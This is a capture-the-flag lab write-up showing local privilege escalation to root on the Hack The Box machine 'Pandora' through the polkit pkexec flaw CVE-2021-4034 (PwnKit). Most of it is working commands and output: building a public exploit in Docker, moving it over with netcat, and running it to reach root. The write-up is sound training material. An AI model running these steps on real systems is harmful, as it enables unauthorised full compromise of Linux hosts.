InfoSec LAB

Pandora_Privilege_Escalation2

Created: 3 min read

CVE-2021-4034

peas discovered that the target system is vulnerable to cve-2021-4034

The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

exploit (pwnkit)

I found an exploit online

matt@pandora:/dev/shm$ make
 
Command 'make' not found, but can be installed with:
 
apt install make        # version 4.2.1-1.2, or
apt install make-guile  # version 4.2.1-1.2
 
Ask your administrator to install one of them.
 
matt@pandora:/dev/shm$ gcc
 
Command 'gcc' not found, but can be installed with:
 
apt install gcc
Please ask your administrator.

The target system doesn’t have compilers installed. Opting out to remote compilation

Docker Exploit Development

┌──(kali㉿kali)-[~/archive/htb/labs/pandora]
└─$ docker run -it --entrypoint "/bin/bash" --name pandora ubuntu:20.04
root@a60a0a959e3e:/# apt update -y ; apt install -y net-tools netcat nano gcc gcc-multilib make git

Setting up the environment

root@a60a0a959e3e:~# git clone https://github.com/berdav/CVE-2021-4034.git ; cd CVE-2021-4034 ; make ; cd .. ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
unpacking objects: 100% (92/92), 22.69 KiB | 1.03 MiB/s, done.
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true gconv_path=./pwnkit.so:.

One-liner

Exploitation

root@a60a0a959e3e:~# nc 10.10.11.136 2222 < CVE-2021-4034.tar.gz
daniel@pandora:/dev/shm$ nc -nlvp 2222 > CVE-2021-4034.tar.gz
Listening on 0.0.0.0 2222
Connection received on 10.10.14.2 59876
daniel@pandora:/dev/shm$ tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034

Delivery complete

daniel@pandora:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# hostname
pandora
# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.11.136  netmask 255.255.254.0  broadcast 10.10.11.255
        inet6 dead:beef::250:56ff:feb9:364  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::250:56ff:feb9:364  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:b9:03:64  txqueuelen 1000  (Ethernet)
        RX packets 1256846  bytes 186612613 (186.6 MB)
        RX errors 0  dropped 96  overruns 0  frame 0
        TX packets 1320626  bytes 1021285573 (1.0 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 49414  bytes 12185892 (12.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 49414  bytes 12185892 (12.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise

Interactive Graph View

Backlinks